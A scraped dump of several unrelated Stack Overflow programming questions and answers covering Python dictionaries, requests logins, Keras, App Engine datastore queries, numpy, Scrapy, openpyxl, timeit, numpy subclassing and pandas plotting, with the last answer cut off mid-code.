nickname = Column(String(3))
name = Column(String(50))
conference = Column(String(10))
division = Column(String(10))
ip = Column(Integer)
# Loop through our standings building up the breakdown results
results = session.query(Game).all()
wins = dict()
losses = dict()
for result in results:
home_team = result.home_team_id
away_team = result.away_team_id
if result.home_score > result.away_score:
wins[home_team][away_team] += 1
losses[away_team][home_team] += 1
else:
wins[away_team][home_team] += 1
losses[home_team][away_team] += 1
</code></pre>
<p>So when I run this code I get the following error:</p>
<pre><code>(venv)vagrant@ibl:/vagrant/scripts$ python playoff_odds.py
Traceback (most recent call last):
File "playoff_odds.py", line 45, in <module>
wins[home_team][away_team] += 1
KeyError: 1
</code></pre>
<p>I did some searching before and it starts getting into the concept of "autovivification", which is something PHP does by default but Python does not.</p>
<p>So how do I duplicate the same behaviour in the Python code?</p>
| 2 | 2016-09-27T18:04:27Z | 39,733,881 | <p><a href="https://en.wikipedia.org/wiki/Autovivification#Python" rel="nofollow">Python's built-in dict class can be subclassed to implement autovivificious dictionaries simply by overriding the <strong>missing</strong>() method </a>, but that's only part of the solution. If you were to simply implement the <code>Tree</code> example in the Wikipedia link and do something like:</p>
<pre><code>wins = Tree()
wins['team_a']['team_b'] += 1
</code></pre>
<p>You'd run into: <code>TypeError: unsupported operand type(s) for +=: 'Tree' and 'int'</code> because the example code will <code>wins['team_a']['team_b']</code> will have automatically been typed <code>Tree</code> as well.</p>
<p>Whereas:</p>
<pre><code>wins = Tree()
wins['team_a']['team_b'] = 1
</code></pre>
<p>would assign the value 1 properly (as it's a reassignment, not an operation on an existing typed value).</p>
<p>The solution would subclassing to implement autovivification <em>and</em> ensuring that the leaf elements are integers that you can operate on. The following should solve this for you, or at least get you started:</p>
<p>The following should help, or at least get you started:</p>
<pre><code>from collections import defaultdict
def autovivify(levels=1, final=dict):
return (defaultdict(final) if levels < 2
else defaultdict(lambda: autovivify(levels - 1, final)))
wins = autovivify(2, int)
losses = autovivify(2, int)
wins['team_a']['team_b'] += 1
losses['team_b']['team_a'] += 1
wins['team_b']['team_c'] += 1
losses['team_c']['team_b'] += 1
wins['team_a']['team_c'] += 1
losses['team_c']['team_a'] += 1
wins['team_a']['team_b'] += 1
losses['team_b']['team_a'] += 1
print(wins['team_a']) # outputs defaultdict(<type 'int'>, {'team_b': 2, 'team_c': 1})
</code></pre>
<p><strong>Source:</strong> <a href="http://blogs.fluidinfo.com/terry/2012/05/26/autovivification-in-python-nested-defaultdicts-with-a-specific-final-type/" rel="nofollow">http://blogs.fluidinfo.com/terry/2012/05/26/autovivification-in-python-nested-defaultdicts-with-a-specific-final-type/</a></p>
<p>The autovivify function will ensure that the first assignment (<code>team_a</code>) will give you another autovivifying tree, and the second (<code>team_b</code>) will give you an integer. From there, your <code>+= 1</code> will continue to increment the initial value of <code>0</code>.</p>
| 2 | 2016-09-27T20:38:12Z | [
"python",
"dictionary"
]
|
How to Login to a Page Where Logins are Optional | 39,731,667 | <p>I'm trying to login to a webpage however, the problem--as far as I cant tell--is that my username and password aren't getting passed by <code>post</code> request. </p>
<p>So far I've tried: </p>
<pre><code>with requests.Session() as s:
p = s.post('http://www.marinetraffic.com/en/users/ajax_user_menu?', headers=user_agent1, data=payload)
r = s.get('http://www.marinetraffic.com/en/ais/index/port_moves/all/include_anchs:yes/ship_type:7/_:3525d580eade08cfdb72083b248185a9/in_transit:yes/time_interval:1474912018_1474998300/per_page:50/port:2341/portname:MUMBAI')
</code></pre>
<p>Where <code>user-agent</code> is my user agent, and <code>payload</code> are my valid login credentials. With both the <code>post</code> and <code>get</code> requests I get a <code>200</code> response, however the page I see is the same as if I hadn't logged in, i.e. the results aren't filtered the way the URL indicates they should be. </p>
<p>How do I make sure that I'm logged in?</p>
| 1 | 2016-09-27T18:16:15Z | 39,731,873 | <p><strong>try this:</strong></p>
<pre><code>payload={
'_method':'POST',
'email':your email,
'password':your passwd,
'is_ajax':True
}
p = s.post('http://www.marinetraffic.com/en/users/ajax_login', headers=user_agent1, data=payload)
</code></pre>
| -1 | 2016-09-27T18:28:21Z | [
"python",
"python-requests"
]
|
How to Login to a Page Where Logins are Optional | 39,731,667 | <p>I'm trying to login to a webpage however, the problem--as far as I cant tell--is that my username and password aren't getting passed by <code>post</code> request. </p>
<p>So far I've tried: </p>
<pre><code>with requests.Session() as s:
p = s.post('http://www.marinetraffic.com/en/users/ajax_user_menu?', headers=user_agent1, data=payload)
r = s.get('http://www.marinetraffic.com/en/ais/index/port_moves/all/include_anchs:yes/ship_type:7/_:3525d580eade08cfdb72083b248185a9/in_transit:yes/time_interval:1474912018_1474998300/per_page:50/port:2341/portname:MUMBAI')
</code></pre>
<p>Where <code>user-agent</code> is my user agent, and <code>payload</code> are my valid login credentials. With both the <code>post</code> and <code>get</code> requests I get a <code>200</code> response, however the page I see is the same as if I hadn't logged in, i.e. the results aren't filtered the way the URL indicates they should be. </p>
<p>How do I make sure that I'm logged in?</p>
| 1 | 2016-09-27T18:16:15Z | 39,732,053 | <p>It is actually completely the wrong url you posted, you need to post to <em><a href="https://www.marinetraffic.com/en/users/ajax_login" rel="nofollow">https://www.marinetraffic.com/en/users/ajax_login</a></em> and set the correct headers:</p>
<pre><code>data = [("_method", (None, "POST")), ("data[email]", (None, "you@mail.com")),
("data[password]", (None, "pass"))]
with requests.Session() as s:
s.headers.update({"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
"X-Requested-With": "XMLHttpRequest"})
p = s.post("https://www.marinetraffic.com/en/users/ajax_login", files=data)
print(p.content)
print(s.get("http://www.marinetraffic.com/en/ajax_user_settings/get_user_settings").json())
</code></pre>
<p>For the record this would also work:</p>
<pre><code>with requests.Session() as s:
data = dict(email="you@mail.com", password="pass", _method="POST")
s.headers.update({"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
"X-Requested-With": "XMLHttpRequest"})
p = s.post("https://www.marinetraffic.com/en/users/ajax_login", data=data)
print p.content
print(s.get("http://www.marinetraffic.com/en/ajax_user_settings/get_user_settings").json())
</code></pre>
| 1 | 2016-09-27T18:39:18Z | [
"python",
"python-requests"
]
|
Merge Variables in Keras | 39,731,669 | <p>I'm building a convolutional neural network with Keras and would like to add a single node with the standard deviation of my data before the last fully connected layer.</p>
<p>Here's a minimum code to reproduce the error:</p>
<pre><code>from keras.layers import merge, Input, Dense
from keras.layers import Convolution1D, Flatten
from keras import backend as K
input_img = Input(shape=(64, 4))
x = Convolution1D(48, 3, activation='relu', init='he_normal')(input_img)
x = Flatten()(x)
std = K.std(input_img, axis=1)
x = merge([x, std], mode='concat', concat_axis=1)
output = Dense(100, activation='softmax', init='he_normal')(x)
</code></pre>
<p>This results in the following <code>TypeError</code>:</p>
<pre><code>-----------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-117-c1289ebe610e> in <module>()
6 x = merge([x, std], mode='concat', concat_axis=1)
7
----> 8 output = Dense(100, activation='softmax', init='he_normal')(x)
/home/ubuntu/anaconda2/envs/tensorflow/lib/python2.7/site-packages/keras/engine/topology.pyc in __call__(self, x, mask)
486 '`layer.build(batch_input_shape)`')
487 if len(input_shapes) == 1:
--> 488 self.build(input_shapes[0])
489 else:
490 self.build(input_shapes)
/home/ubuntu/anaconda2/envs/tensorflow/lib/python2.7/site-packages/keras/layers/core.pyc in build(self, input_shape)
701
702 self.W = self.init((input_dim, self.output_dim),
--> 703 name='{}_W'.format(self.name))
704 if self.bias:
705 self.b = K.zeros((self.output_dim,),
/home/ubuntu/anaconda2/envs/tensorflow/lib/python2.7/site-packages/keras/initializations.pyc in he_normal(shape, name, dim_ordering)
64 '''
65 fan_in, fan_out = get_fans(shape, dim_ordering=dim_ordering)
---> 66 s = np.sqrt(2. / fan_in)
67 return normal(shape, s, name=name)
68
TypeError: unsupported operand type(s) for /: 'float' and 'NoneType'
</code></pre>
<p>Any idea why?</p>
| 3 | 2016-09-27T18:16:22Z | 39,750,977 | <p><code>std</code> is no Keras layer so it does not satisfy the layer input/output shape interface. The solution to this is to use a <a href="https://keras.io/layers/core/#lambda" rel="nofollow"><code>Lambda</code></a> layer wrapping <code>K.std</code>:</p>
<pre><code>from keras.layers import merge, Input, Dense, Lambda
from keras.layers import Convolution1D, Flatten
from keras import backend as K
input_img = Input(shape=(64, 4))
x = Convolution1D(48, 3, activation='relu', init='he_normal')(input_img)
x = Flatten()(x)
std = Lambda(lambda x: K.std(x, axis=1))(input_img)
x = merge([x, std], mode='concat', concat_axis=1)
output = Dense(100, activation='softmax', init='he_normal')(x)
</code></pre>
| 1 | 2016-09-28T14:51:45Z | [
"python",
"tensorflow",
"keras"
]
|
Id isn't returning anything in the Google App Engine datastore | 39,731,674 | <p>I tried select * from post which returns all posts. How can I do a select just for one post using the post_id? I've tried </p>
<pre><code>Select * from post where id='5629499534213120'
select * from post where post_id='5629499534213120'
select * from post where NAME/ID='5629499534213120'
</code></pre>
<p>and it didn't return anything. </p>
<p>Below is an image of my post table</p>
<p><a href="http://i.stack.imgur.com/5ZoFu.png" rel="nofollow"><img src="http://i.stack.imgur.com/5ZoFu.png" alt="Post Table"></a></p>
<p>Below is a detailed view.</p>
<p><a href="http://i.stack.imgur.com/ESmgz.png" rel="nofollow"><img src="http://i.stack.imgur.com/ESmgz.png" alt="detailed view"></a></p>
| 1 | 2016-09-27T18:16:36Z | 39,731,861 | <p>Generally speaking, you probably want to be doing a query with a key literal:</p>
<pre><code>SELECT * FROM Post WHERE __key__ = KEY('Post', 5629499534213120)
</code></pre>
<p>An additional thing to note -- Keys can have either string or integer ids. By default, the IDs are integers so I used an integer in the query above.</p>
| 3 | 2016-09-27T18:27:35Z | [
"python",
"google-app-engine",
"google-cloud-datastore"
]
|
Id isn't returning anything in the Google App Engine datastore | 39,731,674 | <p>I tried select * from post which returns all posts. How can I do a select just for one post using the post_id? I've tried </p>
<pre><code>Select * from post where id='5629499534213120'
select * from post where post_id='5629499534213120'
select * from post where NAME/ID='5629499534213120'
</code></pre>
<p>and it didn't return anything. </p>
<p>Below is an image of my post table</p>
<p><a href="http://i.stack.imgur.com/5ZoFu.png" rel="nofollow"><img src="http://i.stack.imgur.com/5ZoFu.png" alt="Post Table"></a></p>
<p>Below is a detailed view.</p>
<p><a href="http://i.stack.imgur.com/ESmgz.png" rel="nofollow"><img src="http://i.stack.imgur.com/ESmgz.png" alt="detailed view"></a></p>
| 1 | 2016-09-27T18:16:36Z | 39,732,516 | <p>Thanks I was able to get it working using</p>
<pre><code>SELECT * FROM Post WHERE __key__ = Key(blogs, 'default', Post, 5629499534213120)
</code></pre>
| 0 | 2016-09-27T19:08:21Z | [
"python",
"google-app-engine",
"google-cloud-datastore"
]
|
Replicating elements in numpy array | 39,731,771 | <p>I have a numpy array say</p>
<pre><code>a = array([[1, 2, 3],
[4, 5, 6],
[7, 8, 9]])
</code></pre>
<p>I have an array 'replication' of the same size where replication[i,j](>=0) denotes how many times a[i][j] should be repeated along the row. Obiviously, replication array follows the invariant that np.sum(replication[i]) have the same value for all i.
For example, if </p>
<pre><code>replication = array([[1, 2, 1],
[1, 1, 2],
[2, 1, 1]])
</code></pre>
<p>then the final array after replicating is:</p>
<pre><code>new_a = array([[1, 2, 2, 3],
[4, 5, 6, 6],
[7, 7, 8, 9]])
</code></pre>
<p>Presently, I am doing this to create new_a:</p>
<pre><code> ##allocate new_a
h = a.shape[0]
w = a.shape[1]
for row in range(h):
ll = [[a[row][j]]*replicate[row][j] for j in range(w)]
new_a[row] = np.array([item for sublist in ll for item in sublist])
</code></pre>
<p>However, this seems to be too slow as it involves using lists. Can I do the intended entirely in numpy, without the use of python lists?</p>
| 1 | 2016-09-27T18:22:55Z | 39,732,014 | <p>You can flatten out your <code>replication</code> array, then use the <a href="http://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.repeat.html" rel="nofollow"><code>.repeat()</code></a> method of <code>a</code>:</p>
<pre><code>import numpy as np
a = array([[1, 2, 3],
[4, 5, 6],
[7, 8, 9]])
replication = array([[1, 2, 1],
[1, 1, 2],
[2, 1, 1]])
new_a = a.repeat(replication.ravel()).reshape(a.shape[0], -1)
print(repr(new_a))
# array([[1, 2, 2, 3],
# [4, 5, 6, 6],
# [7, 7, 8, 9]])
</code></pre>
| 3 | 2016-09-27T18:36:30Z | [
"python",
"arrays",
"numpy",
"replicate"
]
|
Scrapy - iterate over object | 39,731,804 | <p>this is how I'm running <code>scrapy</code> from a <code>Python</code> script:</p>
<pre><code>def iterate():
process = CrawlerProcess(get_project_settings())
tracks = process.crawl('pitchfork_tracks', domain='pitchfork.com')
process.start()
</code></pre>
<p>however, I can't seem to <code>iterate</code> through the <code>response</code>, which is a a <code>dict</code> in this fashion:</p>
<pre><code>{'track': [u'\u201cAnxiety\u201d',
u'\u201cLockjaw\u201d [ft. Kodak Black]',
u'\u201cMelanin Drop\u201d',
u'\u201cDreams\u201d',
u'\u201cIntern\u201d',
u'\u201cYou Don\u2019t Think You Like People Like Me\u201d',
u'\u201cFirst Day Out tha Feds\u201d',
u'\u201cFemale Vampire\u201d',
u'\u201cGirlfriend\u201d',
u'\u201cOpposite House\u201d',
u'\u201cGirls @\u201d [ft. Chance the Rapper]',
u'\u201cI Am a Nightmare\u201d']}
</code></pre>
<p>how do I <code>iterate</code> through this <code>response</code>? To my knowledge, up to this point the response it is an <code>object</code> and thus non-iterable.</p>
| 0 | 2016-09-27T18:24:34Z | 39,732,758 | <p>You should follow the work flow of Scrapy Framework. Spider handles how requests are built and responses are parsed. ItemPipeline handles how items are operated.</p>
<p>From your code:</p>
<pre><code>tracks = process.crawl('pitchfork_tracks', domain='pitchfork.com')
</code></pre>
<p><code>pitchfork_tracks</code> is a spider name in your project. So you should handle the iteration on response in the spider, and do further operation in itempipeline. For the ItemPipeline part, you need to manually configure the settings of scrapy script. Check the docs for running scrapy from script approaches <a href="https://doc.scrapy.org/en/latest/topics/practices.html#run-scrapy-from-a-script" rel="nofollow">common practice-run from script</a></p>
<p>By the way, according to the docs <a href="https://doc.scrapy.org/en/latest/topics/api.html#scrapy.crawler.CrawlerProcess" rel="nofollow">CrawlerProcess</a>,</p>
<p>tracks = process.crawl('pitchfork_tracks', domain='pitchfork.com')</p>
<p><code>tracks</code> is a twist <code>defer</code> object, and this object is not iterable. Unless you are familiar with twist and Scrapy internal part, you'd better follow work flow of Scrapy framework.</p>
<p>Thanks.</p>
| 0 | 2016-09-27T19:24:45Z | [
"python",
"scrapy",
"iteration"
]
|
Python import error: 'Cannot import name' | 39,731,807 | <p>Im having trouble importing a class on a python module.</p>
<p>Here are my directory structure:</p>
<pre><code>_wikiSpider
+scrapy.cfg
_wikiSpider
+__init__.py
+items.py
+items.pyc
+settings.py
+settings.pyc
+pipelines.py
_spiders
+__init__.py
+__init__.pyc
+articleSpider.py
+articleSpider.pyc
+items.py
</code></pre>
<p>Code breaks at this line:</p>
<pre><code>from wikiSpider.items import Article
</code></pre>
<p>Im not sure why, since class Article is defined at items.py (deepest folder)</p>
<p>Can someone give me an explanation?</p>
| 0 | 2016-09-27T18:24:50Z | 39,731,967 | <p>You have an items.py in both your root and _spiders folder. To reference a file in a subfolder you need the folder name and the file.</p>
<p>from _spiders.items import Article </p>
<p>assuming the file that imports this code is in your root directory. Python uses a you are here, to current file location, for it's directory hierarchy.</p>
| 1 | 2016-09-27T18:33:43Z | [
"python",
"import",
"scrapy"
]
|
Q: OpenPyxl checking for existing row and then updating cell | 39,731,903 | <p>I want to check for a name column in an existing spreadsheet and if it exists I want to update a specific column with a time stamp for that row. I'm in a rut because I can't figure out how to go about this with out a for loop. The for loop will append more rows for the ones it didnt match and nothing shows up in column when I try to stamp it after matching a name with a row. </p>
<pre><code> for rowNum in range(2, ws1.max_row):
log_name = ws1.cell(row=rowNum,column=1).value
if log_name == chkout_new_name_text:
print 'apple' + 'pen'
ws1.cell(row=rowNum, column=2).value = str(time.strftime("%m/%d/%y %H:%M %p"))
break
else:
continue
print 'pen' + 'pineapple'
# Normal procedure
</code></pre>
<p>Any help will be greatly appreciated.</p>
| 0 | 2016-09-27T18:30:02Z | 39,798,105 | <p>Figured it out</p>
<pre><code> name_text = raw_input("Please enter name: ")
matching_row_nbr = None
for rowNum in range(2, ws1.max_row + 1 ):
log_name = ws1.cell(row=rowNum,column=1).value
if log_name == name_text:
# Checks for a matching row and remembers the row number
matching_row_nbr = rowNum
break
if matching_row_nbr is not None:
# Uses the matching row number to change the cell value of the specific row
ws1.cell(row=matching_row_nbr, column=6).value = str(time.strftime("%m/%d/%y %H:%M - %p"))
wb.save(filename = active_workbook)
else:
# If the none of the rows match then continue with intended use of new data
print name_text
</code></pre>
| 0 | 2016-09-30T18:42:12Z | [
"python",
"openpyxl"
]
|
python's `timeit` doesn't always scale linearly with number? | 39,732,027 | <p>I'm running Python 2.7.10 on a 16GB, 2.7GHz i5, OSX 10.11.5 machine. </p>
<p>I've observed this phenomenon many times in many different types of examples, so the example below, though a bit contrived, is representative. It's just what I happened to be working on earlier today when my curiosity finally piqued. </p>
<pre><code>>>> timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=100)
3.790855407714844e-05
>>> timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=1000)
0.0003371238708496094
>>> timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=10000)
0.014712810516357422
>>> timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=100000)
0.029777050018310547
>>> timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=1000000)
0.21139287948608398
</code></pre>
<p>You'll notice that, from 100 to 1000, there's a factor of 10 increase in the time, as expected. However, 1e3 to 1e4, it's more like a factor of 50, and then a factor of 2 from 1e4 to 1e5 (so a total factor of 100 from 1e3 to 1e5, which is expected). </p>
<p>I'd figured that there must be some sort of caching-based optimization going on either in the actual process being timed or in <code>timeit</code> itself, but I can't quite figure out empirically whether this is the case. The imports don't seem to matter, as can be observed this with a most basic example:</p>
<pre><code>>>> timeit('1==1', number=10000)
0.0005490779876708984
>>> timeit('1==1', number=100000)
0.01579904556274414
>>> timeit('1==1', number=1000000)
0.04653501510620117
</code></pre>
<p>where from 1e4 to 1e6 there's a true factor of 1e2 time difference, but the intermediate steps are ~30 and ~3. </p>
<p>I could do more ad hoc data collection but I haven't got a hypothesis in mind at this point. </p>
<p>Any notion as to why the non-linear scale at certain intermediate numbers of runs?</p>
| 9 | 2016-09-27T18:37:25Z | 39,732,127 | <p>This has to do with a smaller number of runs not being accurate enough to get the timing resolution you want.</p>
<p>As you increase the number of runs, the ratio between the times approaches the ratio between the number of runs:</p>
<pre><code>>>> def timeit_ratio(a, b):
... return timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=a) / timeit('unicodedata.category(chr)', setup = 'import unicodedata, random; chr=unichr(random.randint(0,50000))', number=b)
>>> for i in range(32):
... r = timeit_ratio(2**(i+1), 2**i)
... print 2**i, 2**(i+1), r, abs(r - 2)**2 # mean squared error
...
1 2 3.0 1.0
2 4 1.0 1.0
4 8 1.5 0.25
8 16 1.0 1.0
16 32 0.316455696203 2.83432142285
32 64 2.04 0.0016
64 128 1.97872340426 0.000452693526483
128 256 2.05681818182 0.00322830578512
256 512 1.93333333333 0.00444444444444
512 1024 2.01436781609 0.000206434139252
1024 2048 2.18793828892 0.0353208004422
2048 4096 1.98079658606 0.000368771106961
4096 8192 2.11812990721 0.0139546749772
8192 16384 2.15052027269 0.0226563524921
16384 32768 1.93783596324 0.00386436746641
32768 65536 2.28126901347 0.0791122579397
65536 131072 2.18880312306 0.0356466192769
131072 262144 1.8691643357 0.0171179710535
262144 524288 2.02883451562 0.000831429291038
524288 1048576 1.98259818317 0.000302823228866
1048576 2097152 2.088684654 0.00786496785554
2097152 4194304 2.02639479643 0.000696685278755
4194304 8388608 1.98014042724 0.000394402630024
8388608 16777216 1.98264956218 0.000301037692533
</code></pre>
| 8 | 2016-09-27T18:43:06Z | [
"python",
"performance",
"optimization",
"timeit"
]
|
Will file be closed after "open(file_name, 'w+').write(somestr)" | 39,732,042 | <p>I'm new to python.</p>
<p>I wonder if I write:</p>
<pre><code>open('/tmp/xxx.txt', 'w+').write('aabb')
</code></pre>
<p>Will the file be still opened or closed?</p>
<p>In another word, what's the difference between the above and</p>
<pre><code>with open('/tmp/xxx.txt', 'w+') as f:
f.write('aabb')
</code></pre>
| 1 | 2016-09-27T18:38:40Z | 39,732,059 | <p>The file might stay open.</p>
<p>Keep in mind that it <strong>will</strong> be automatically closed upon garbage collection or software termination but it's a bad practice to count on it as exceptions, frames or even delayed GC might keep it open.</p>
<p>Also, you might lose data if the program terminated unexpectedly and you don't <code>flush()</code> it.</p>
<hr>
<p>In many distributions of python, where the GC is different (PyParallel for example) it might cause a big problem.</p>
<p>Even in CPython, it might still stay open in case of frame reference for example. Try running this:</p>
<pre><code>import sys
glob_list = []
def func(*args, **kwargs):
glob_list.append((args, kwargs))
return func
sys.settrace(func)
open('/tmp/xxx.txt', 'w+').write('aabb')
</code></pre>
| 1 | 2016-09-27T18:39:31Z | [
"python"
]
|
Calculating average and outputting number of cases which were more than and less than average from a list | 39,732,096 | <p>Task:
Write an algorithm to allow a user to input the maximum and minimum daily temperatures for a number of days until a maximum temperature of 999 is entered.</p>
<p>The program then calculates the average temperature and outputs the number of days that the temperature was above average. It also outputs the number of days that the temperature was negative.</p>
<p>My code that returns with a syntax error: <a href="http://imgur.com/ArMFAk3" rel="nofollow">http://imgur.com/ArMFAk3</a></p>
| -2 | 2016-09-27T18:41:32Z | 39,732,166 | <p><code>input</code> returns a string. To make it an integer do <code>int( input('Enter temperature: '))</code></p>
| 0 | 2016-09-27T18:45:52Z | [
"python"
]
|
Calculating average and outputting number of cases which were more than and less than average from a list | 39,732,096 | <p>Task:
Write an algorithm to allow a user to input the maximum and minimum daily temperatures for a number of days until a maximum temperature of 999 is entered.</p>
<p>The program then calculates the average temperature and outputs the number of days that the temperature was above average. It also outputs the number of days that the temperature was negative.</p>
<p>My code that returns with a syntax error: <a href="http://imgur.com/ArMFAk3" rel="nofollow">http://imgur.com/ArMFAk3</a></p>
| -2 | 2016-09-27T18:41:32Z | 39,732,286 | <p>Reading through the code in the image that you posted and assuming that your algorithm is correct, the following code does what you want (Python 2.7):</p>
<pre><code>import numpy as np
temperatures = []
total = 0
maxtemp = 999
while total < maxtemp:
data = input("What is your temperature: ")
temperatures.append(data)
total = total + data
mean = np.mean(temperatures)
above = temperatures > mean
below = temperatures < mean
print mean
print sum(above)
print sum(below)
</code></pre>
<p>Note what was wrong with your syntax:</p>
<ol>
<li>You try to call <code>len()</code> on an integer</li>
<li>You put a <code>break</code> at the end of a while loop. This means you will only be able to get through the loop once</li>
<li>It appears you try to call <code>len.(above)</code>. There is no need for the period and also <code>len()</code> will return the length of <code>temperatures</code> whereas <code>sum()</code> returns the number of <code>True</code> values</li>
</ol>
| 0 | 2016-09-27T18:52:50Z | [
"python"
]
|
Subclassing numpy.ndarray - why is __array_finalize__ not being called twice here? | 39,732,213 | <p>According to <a href="http://docs.scipy.org/doc/numpy/user/basics.subclassing.html" rel="nofollow">this</a> primer on subclassing <code>ndarray</code>, the <code>__array_finalize__</code> method is guaranteed to be called, no matter if the subclass is instantiated directly, casted as a view or created from a template.</p>
<p>In particular, when calling the constructor explicitly, the order of methods called is <code>__new__</code> -> <code>__array_finalize__</code> -> <code>__init__</code>.</p>
<p>I have the following simple subclass of <code>ndarray</code> which allows an additional <code>title</code> attribute.</p>
<pre><code>class Frame(np.ndarray):
def __new__(cls, input_array, title='unnamed'):
print 'calling Frame.__new__ with title {}'.format(title)
self = input_array.view(Frame) # does not call __new__ or __init__
print 'creation of self done, setting self.title...'
self.title = title
return self
def __array_finalize__(self, viewed):
# if viewed is None, the Frame instance is being created by an explicit
# call to the constructor, hence Frame.__new__ has been called and the
# title attribute is already set
#
# if viewed is not None, the frame is either being created by view
# casting or from template, in which case the title of the viewed object
# needs to be forwarded to the new instance
print '''calling Frame.__array_finalize__ with type(self) == {} and
type(viewed) == {}'''.format(type(self), type(viewed))
if viewed is not None:
self.title = getattr(viewed, 'title', 'unnamed')
print self.title
</code></pre>
<p>which produces the following output:</p>
<pre><code>>>> f = Frame(np.arange(3), 'hallo')
calling Frame.__new__ with title hallo
calling Frame.__array_finalize__ with type(self) == <class '__main__.Frame'> and
type(viewed) == <type 'numpy.ndarray'>
unnamed
creation of self done, setting self.title...
>>> f.title
'hallo'
</code></pre>
<p>As you can see, <code>__array_finalize__</code> is being called as a result of the line</p>
<pre><code> self = input_array.view(Frame)
</code></pre>
<p>Question: why is <code>__array_finalize__</code> not being called again as part of the <code>__new__</code> -> <code>__array_finalize__</code> -> <code>__init__</code> chain?</p>
| 3 | 2016-09-27T18:48:35Z | 39,733,070 | <p>In the documentation you link to, it describes how <code>ndarray.__new__</code> will call <code>__array_finalize__</code> on the arrays it constructs. And your class's <code>__new__</code> method is causing that to happen when you create your instance as a <code>view</code> of an existing array. The <code>view</code> method on the array argument is calling <code>ndarray.__new__</code> for you, and it calls your <code>__array_finalize__</code> method before the instance is returned to you.</p>
<p>You don't see <code>__array_finalize__</code> called twice because you're not calling <code>ndarray.__new__</code> a second time. If your <code>__new__</code> method included a call to <code>super().__new__</code> in addition to the <code>view</code> call, you probably would see <code>__array_finalized__</code> called twice. Such behavior would probably be buggy (or at least, slower than necessary), so it's no surprise you're not doing it!</p>
<p>Python doesn't automatically call overridden methods when the overriding subclass's method gets called. It's up to the overriding method to call (or not call) the overridden version (directly with <code>super</code> or, as in this case, indirectly via another object's <code>view</code> method).</p>
| 1 | 2016-09-27T19:44:27Z | [
"python",
"numpy",
"inheritance"
]
|
Python 3: Traceback : TypeError | 39,732,281 | <p>I'm new in python 3 and I don't understand why I get a Type Error (this is a guess a number game for numbers between 0-100):</p>
<pre><code>print("Please think of a number between 0 and 100!")
low = 0
high = 100
check = False
while True :
guess = (low + high)/2
print("Enter 'h' to indicate the guess is too high.\n")
print("Enter 'l' to indicate the guess is too low.\n" )
print("Enter 'c' to indicate I guessed correctly.\n")
ans = input("")
if ans == "h" :
low = ans
elif ans == "l" :
high = ans
elif ans =="c" :
print( "Game over. Your secret number was:{}".format(guess))
break
else :
print("Sorry, I did not understand your input.")
</code></pre>
<p>here is the error : </p>
<pre><code>Traceback (most recent call last):
File "<stdin>", line 1, in <module>
</code></pre>
<p>Thanks in advance.I'd really appreciate your help I'm stuck in this</p>
| -1 | 2016-09-27T18:52:34Z | 39,732,418 | <p>On the line <code>low = ans</code> you set low to be a string value, the string value "h"</p>
<p>Then on the second time you pass through the loop, you try to calculate
<code>(low + high</code>)/2` You can't calculate ("h" + 100)/2 because you cant add the string to the integer. This is a "type error"</p>
<p>For each line explain to a friend (or a soft toy) what each line does and why you are certain each line is correct.</p>
| 0 | 2016-09-27T19:01:46Z | [
"python",
"typeerror",
"traceback"
]
|
Python 3: Traceback : TypeError | 39,732,281 | <p>I'm new in python 3 and I don't understand why I get a Type Error (this is a guess a number game for numbers between 0-100):</p>
<pre><code>print("Please think of a number between 0 and 100!")
low = 0
high = 100
check = False
while True :
guess = (low + high)/2
print("Enter 'h' to indicate the guess is too high.\n")
print("Enter 'l' to indicate the guess is too low.\n" )
print("Enter 'c' to indicate I guessed correctly.\n")
ans = input("")
if ans == "h" :
low = ans
elif ans == "l" :
high = ans
elif ans =="c" :
print( "Game over. Your secret number was:{}".format(guess))
break
else :
print("Sorry, I did not understand your input.")
</code></pre>
<p>here is the error : </p>
<pre><code>Traceback (most recent call last):
File "<stdin>", line 1, in <module>
</code></pre>
<p>Thanks in advance.I'd really appreciate your help I'm stuck in this</p>
| -1 | 2016-09-27T18:52:34Z | 39,732,459 | <p>A couple of things. </p>
<ol>
<li>You should probably print the guess so that the user knows whether it is too high or too low</li>
<li><code>low==ans</code> doesn't make any sense. <code>ans</code> will either be "h", "l", or "c", assuming the user follows the rules. <code>low</code> and <code>high</code> need to be numbers in order to generate the <code>guess</code> appropriately</li>
</ol>
<p>Also your logic was incorrect. The below code works. </p>
<pre><code>print("Please think of a number between 0 and 100!")
low = 0
high = 100
check = False
while True:
guess = (low + high)/2
print("My guess is: %i" % guess)
ans = input("Enter 'h' if guess it too high, 'l' if too low, or 'c' if correct: ")
print(ans)
if ans == "h":
high = guess
elif ans == "l":
low = guess
elif ans == "c":
print("Game over. Your secret number was:{}".format(guess))
break
else:
print("Sorry, I did not understand your input.")
</code></pre>
| 0 | 2016-09-27T19:04:04Z | [
"python",
"typeerror",
"traceback"
]
|
Pandas: how to plot a line in a scatter and bring it to the back/front? | 39,732,288 | <p>I have checked to the best of my capabilities but haven't found any <code>kwds</code> that allow you to draw a line (such as <code>y=a-x</code>) on a <code>pandas</code> scatter plot (not necessarily the line of best fit) and bring it to the back (or to the front).</p>
<pre><code>#the data frame
ax=df.plot(kind='scatter', x='myX', y='myY',title="Nice title",
xlim=[0,100],ylim=[0,100],figsize=(8,5), grid=True,fontsize=10)
#the line
lnsp=range(0,110,10)
line=[100-i for i in lnsp] #line is y=100-x
ax=line_df.plot(kind='line',color='r',ax=ax,legend=False,grid=True,linewidth=3)
</code></pre>
<p>Is there anything I can use? Or is it just the order in which the two things are drawn?</p>
| 0 | 2016-09-27T18:53:06Z | 39,742,812 | <p>You need to define an axis, and then pass the pandas plot to that axis. You then plot whatever line to that previously defined axis. Here is a solution.</p>
<pre><code>x = np.random.randn(100)
y = np.random.randn(100)
line = 0.5*np.linspace(-4, 4, 100)
x_line = np.linspace(-4, 4, 100)
fig, ax = plt.subplots(figsize=(8,5))
